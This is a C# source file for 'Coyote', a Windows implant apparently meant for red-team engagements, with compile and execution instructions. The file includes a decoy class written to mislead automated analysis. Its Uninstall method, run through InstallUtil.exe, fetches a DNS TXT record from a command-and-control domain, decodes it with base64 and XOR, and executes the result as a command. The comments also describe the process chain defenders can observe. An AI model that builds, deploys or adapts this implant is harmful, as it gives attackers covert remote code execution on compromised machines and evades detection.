/*
Implant for maintaining covert access to compromised Windows infrastructure during red team engagements
https://github.com/TartarusLabs/Coyote
To compile it: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /target:library /out:coyote.dll coyote.cs
To execute it: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U coyote.dll
Refer to the README.md for full usage details
*/
using System;
using System.Diagnostics;
using System.IO;
using System.Text;
namespace Coyote
{
// Some decoy functionality to make this look like a legit DLL at least to automated analysis. You can delete the entire CoyoteMaths class and the implant will still work, but a DLL with nothing but an Uninstall method looks suspicious af.
public class CoyoteMaths
{
    // Decoy only: nothing in this file calls this class, and the author's note above says
    // the implant works without it. Triage should focus on Sample.Uninstall below.
    // Set once by the constructor and only read by CoyoteCompute.
    private bool bInitialised = false;
    // Backing store for the Useful property; not consulted anywhere else in this file.
    private bool bUseful = false;
    // Scratch counters shuffled by CoyoteCompute; private, so never observed outside this class.
    private long x1, x2, x3;

    // Seeds the counters with 0, 2, 4 and marks the instance initialised.
    public CoyoteMaths()
    {
        x1 = 0;
        x2 = 2;
        x3 = 4;
        bInitialised = true;
    }

    // Plain addition helper used once by CoyoteCompute.
    private long AddThem(long a, long b)
    {
        return a + b;
    }

    // Rotates the counters when initialised: x1 <- x2, x2 <- 2*x3, x3 <- x1 + 8
    // (using the freshly assigned x1). Does nothing if bInitialised is false, which
    // cannot happen for an instance built through the constructor above.
    public void CoyoteCompute()
    {
        if (bInitialised)
        {
            x1 = x2;
            x2 = x3 * 2;
            x3 = AddThem(x1,8);
        }
    }

    // Simple read/write flag with no effect on any other member.
    public bool Useful
    {
        get
        {
            return bUseful;
        }
        set
        {
            bUseful = value ;
        }
    }
}
// The important bit
// The operative class. Deriving from Installer with RunInstaller(true) is what lets
// "InstallUtil.exe /U coyote.dll" load the assembly and call the Uninstall override
// below; that override is the only code path in this file with any effect.
// Observable chain for defenders: InstallUtil.exe -> nslookup.exe "-q=txt <domain>"
// -> a further child of InstallUtil.exe started from the decoded TXT content. The TXT
// lookup for the configured domain is also visible in DNS query logs.
[System.ComponentModel.RunInstaller(true)]
public class Sample : System.Configuration.Install.Installer
{
    // Standard base64 decode, bytes interpreted as UTF-8.
    // Throws FormatException on malformed input; nothing below catches it.
    private static string Base64Decode(string base64EncodedData)
    {
        var base64EncodedBytes = System.Convert.FromBase64String(base64EncodedData);
        return System.Text.Encoding.UTF8.GetString(base64EncodedBytes);
    }

    // Repeating-key XOR: each char of ciphertext is XORed with key[i % key.Length].
    // This is obfuscation rather than encryption (symmetric; the same routine encodes
    // and decodes, and the key is a hard-coded string in Uninstall). Divides by zero if
    // key is empty.
    private string XORDecrypt(string ciphertext, string key)
    {
        var plaintext = new StringBuilder();
        for (int cipherchar = 0; cipherchar < ciphertext.Length; cipherchar++)
        {
            plaintext.Append((char)((uint)key[cipherchar % key.Length] ^ (uint)ciphertext[cipherchar]));
        }
        return plaintext.ToString();
    }

    // Entry point reached via InstallUtil.exe /U. savedState is ignored and the base
    // Installer.Uninstall is never called. Behaviour, all visible below: run nslookup for
    // the TXT record of c2domain, and for every output line containing a double quote,
    // trim whitespace and quote characters, base64-decode, XOR-decode with XORkey and
    // pass the resulting string to Process.Start. No exception is caught, so a malformed
    // record propagates as an unhandled exception into InstallUtil.
    public override void Uninstall(System.Collections.IDictionary savedState)
    {
        string c2domain = "updates.tartaruslabs.com"; // Change this to your own FQDN where you will place your DNS TXT record
        string XORkey = "pizza"; // Set this to the same XOR key you used in payload-encrypt.ps1

        // The lookup is delegated to the system nslookup binary (absolute path) rather than
        // a managed DNS API, so a nslookup.exe child of InstallUtil.exe with "-q=txt" in its
        // command line is the process-level artefact of this code.
        ProcessStartInfo siNslookup = new ProcessStartInfo();
        siNslookup.UseShellExecute = false;
        siNslookup.RedirectStandardOutput = true;
        siNslookup.FileName = @"C:\Windows\System32\nslookup.exe";
        siNslookup.Arguments = "-q=txt " + c2domain;
        Process pNslookup = Process.Start(siNslookup);

        // Reads nslookup's stdout line by line; the process exit is never awaited.
        using (StreamReader reader = pNslookup.StandardOutput)
        {
            string strOutput;
            while (!reader.EndOfStream)
            {
                strOutput = reader.ReadLine();
                // Only lines carrying a double quote are treated as TXT record data.
                if (strOutput.Contains("\""))
                {
                    strOutput = strOutput.Trim();
                    strOutput = strOutput.Trim('"');
                    // The decoded string is the FileName of the new ProcessStartInfo;
                    // with UseShellExecute = true it is resolved by the Windows shell
                    // (file-association handling), not by CreateProcess directly.
                    ProcessStartInfo siCommand = new ProcessStartInfo(XORDecrypt(Base64Decode(strOutput),XORkey));
                    siCommand.UseShellExecute = true;
                    siCommand.RedirectStandardOutput = false;
                    Process pCommand = Process.Start(siCommand);
                }
            }
        }
    }
}
}
}